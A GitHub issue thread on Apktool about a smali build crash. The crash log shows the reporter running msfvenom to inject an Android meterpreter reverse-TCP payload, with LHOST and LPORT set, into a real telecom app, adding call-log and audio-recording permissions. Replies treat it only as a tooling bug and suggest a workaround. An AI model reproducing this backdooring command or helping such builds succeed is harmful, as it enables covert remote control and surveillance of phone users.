### ISSUE TITLE
org.jf.util.ExceptionWithContext - LongSparseArray

### ISSUE THREAD

**Issue by VENUROCKS** [iBotPeaches/Apktool#2177]
### Information
1. **Apktool Version (`apktool -version`)** -2.4.0
2. **Operating System (Mac, Linux, Windows)** -kali linux
3. **APK From? (Playstore, ROM, Other)** -apkmonk

### Stacktrace/Logcat

```
Include stacktrace here
root@kali:~/Desktop# apktool d myairtel.apk
I: Using Apktool 2.4.0 on myairtel.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Baksmaling classes2.dex...
I: Baksmaling classes3.dex...
I: Baksmaling classes4.dex...
I: Baksmaling classes5.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
root@kali:~/Desktop# apktool b myairtel.apk
I: Using Apktool 2.4.0
brut.directory.PathNotExist: apktool.yml
root@kali:~/Desktop# msfvenom -x myairtel.apk -p android/meterpreter/reverse_tcp LHOST=192.168.43.247 LPORT=4444 -o s.apk
Using APK template: myairtel.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.myairtelapp.vudey
[*] Loading /tmp/d20190920-8030-1gfc7e1/original/smali_classes3/com/myairtelapp/global/App.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Rebuilding myairtel.apk with meterpreter injection as /tmp/d20190920-8030-1gfc7e1/output.apk
[-] I: Using Apktool 2.4.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" org.jf.util.ExceptionWithContext: Exception occurred while writing code_item for method Landroid/support/v4/util/LongSparseArray;->clone()Landroid/support/v4/util/LongSparseArray;
	at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:917)
	at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:341)
	at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:297)
	at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61)
	at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:36)
	at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:419)
	at brut.androlib.Androlib.buildSources(Androlib.java:350)
	at brut.androlib.Androlib.build(Androlib.java:302)
	at brut.androlib.Androlib.build(Androlib.java:269)
	at brut.apktool.Main.cmdBuild(Main.java:247)
	at brut.apktool.Main.main(Main.java:79)
Caused by: org.jf.util.ExceptionWithContext: Error while writing instruction at code offset 0x13
	at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1190)
	at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:913)
	... 10 more
Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65558
	at org.jf.dexlib2.writer.DexDataWriter.writeUshort(DexDataWriter.java:116)
	at org.jf.dexlib2.writer.InstructionWriter.write(InstructionWriter.java:356)
	at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1150)
	... 11 more

```

### Steps to Reproduce
1. `apktool `

### Frameworks
If this APK is from an OEM ROM (Samsung, HTC, LG). Please attach framework files
(`.apks` that live in `/system/framework` or `/system/priv-app`)

### APK
If this APK can be freely shared, please upload/attach a link to it.

### Questions to ask before submission
1. Have you tried `apktool d`, `apktool b` without changing anything?yes
2. If you are trying to install a modified apk, did you resign it?it is not resigning
3. Are you using the latest apktool version?yes

**Comment by Beery1** [comment]
主dex方法数超了

**Comment by iBotPeaches** [comment]
This looks like a crash in the low level of smali, maybe try with jesusfreke/smali repo? Marking as 3rd party

**Comment by starbuddy55** [comment]
I am facing the same error.. 
Am using apktool 2.4.1
Any solutions?

**Comment by dgimb89** [comment]
Potential workaround: In case the app will not load the `LongSparseArray` class, you could try removing the respective smali file (`android/support/v4/util/LongSparseArray.smali`).

**Comment by iBotPeaches** [comment]
See the explanation from JF here - https://github.com/JesusFreke/smali/issues/469

Next release will have smali/baksmali v2.4.0.

Closing
